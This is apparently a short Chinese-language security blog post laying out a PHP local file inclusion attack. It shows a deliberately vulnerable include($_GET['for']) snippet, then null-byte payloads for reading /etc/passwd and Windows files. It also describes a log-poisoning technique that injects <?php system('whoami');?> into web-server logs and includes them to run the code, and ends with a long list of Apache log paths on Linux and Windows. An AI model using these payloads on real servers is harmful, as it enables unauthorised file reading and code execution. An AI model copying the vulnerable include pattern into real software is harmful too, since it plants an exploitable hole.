0x00 案例
参考资料:http://downloads.ackack.net/LocalFileInclusion.pdf
实验代码:
<?php
include($_GET['for'].‘.php’);//用于测试本地包含漏洞
?>
Linux
test.php?for=/etc/passwd%00
Win
test.php?for=D:\readme.txt%00
Log Injection
訪問任意頁面,問號後面寫payload,將payload寫入到log中,然後包含log文件執行payload。
test.php?<php%20system('whoami');?>
當然,需要服務器開啟日誌記錄功能。
DoFuck
//linux
test.php?for=/var/log/apache/logs/access_log%00
//win
test.php?for=..\apache\logs\access.log%00
附录:可能的log路径
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/opt/lampp/logs/access_log
/opt/lampp/logs/error_log
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/www/logs/thttpd_log
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/thttpd_log
/var/www/log/access_log
/var/www/log/error_log
/var/www/logs/access.log
/var/www/logs/access_log
/var/www/logs/error.log
/var/www/logs/error_log
C:\apache\logs\access.log
C:\apache\logs\error.log
C:\Program Files\Apache Group\Apache\logs\access.log
C:\Program Files\Apache Group\Apache\logs\error.log
C:\program files\wamp\apache2\logs
C:\wamp\apache2\logs
C:\wamp\logs
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
FROM : virzz.com | Author:Virink
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论